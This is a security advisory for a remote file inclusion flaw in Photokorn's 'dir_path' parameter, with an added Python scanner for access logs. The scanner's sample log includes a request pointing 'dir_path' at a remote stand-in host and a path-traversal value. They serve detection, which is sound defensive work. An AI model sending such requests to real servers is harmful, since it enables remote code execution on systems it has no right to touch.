Intrusion Prevention

Photokorn.File.Inclusion

Description

This indicates a possible attempt to exploit one of several vulnerabilities that have been identified in Photokorn.
These vulnerabilities are due to input validation errors in various scripts (for example "includes/cart.inc.php" and "extras/ext_cats.php") that do not validate the "dir_path" parameter. They could be exploited by remote attackers to include malicious scripts and execute arbitrary commands with the privileges of the web server.
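A log check for the condition described above, as an added example that is not part of the original advisory or of Photokorn: it scans web server access log lines for requests to PHP scripts that set "dir_path" in the query string and classifies the supplied value. The combined log format, the "/photokorn/" install path, the sample lines and the assumption that legitimate clients never send "dir_path" are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP, request target and status from a combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A scheme prefix means the include path points at another host.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)

def classify(value):
    """Grade a decoded dir_path value by how it tries to redirect the include."""
    if REMOTE_RE.match(value) or value.startswith('//'):
        return 'remote-url'
    if '..' in value or value.startswith('/') or '\x00' in value:
        return 'path-manipulation'
    return 'client-supplied'  # assumption: still unexpected from a normal client

def scan(lines):
    """Return (client_ip, script, status, verdict) for each request setting dir_path."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith('.php'):
            continue
        # parse_qs percent-decodes, so encoded values are classified correctly.
        for value in parse_qs(url.query, keep_blank_values=True).get('dir_path', []):
            hits.append((ip, url.path, int(status), classify(value)))
    return hits

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Sep/2006:10:00:01 +0000] '
    '"GET /photokorn/index.php?cat=3 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Sep/2006:10:02:13 +0000] "GET /photokorn/includes/'
    'cart.inc.php?dir_path=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 312',
    '203.0.113.7 - - [10/Sep/2006:10:02:15 +0000] '
    '"GET /photokorn/extras/ext_cats.php?dir_path=../../tmp/ HTTP/1.0" 404 209',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the query string, so a "dir_path" value sent in a POST body would not appear here and needs request-body inspection at the IPS or web application firewall.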

Affected Products

Photokorn version 1.52 and prior.

Impact

System compromise: remote code execution.

Recommended Actions

Upgrade to version 1.6:
http://www.telekorn.com/cms/front_content.php

CVE References

CVE-2006-4670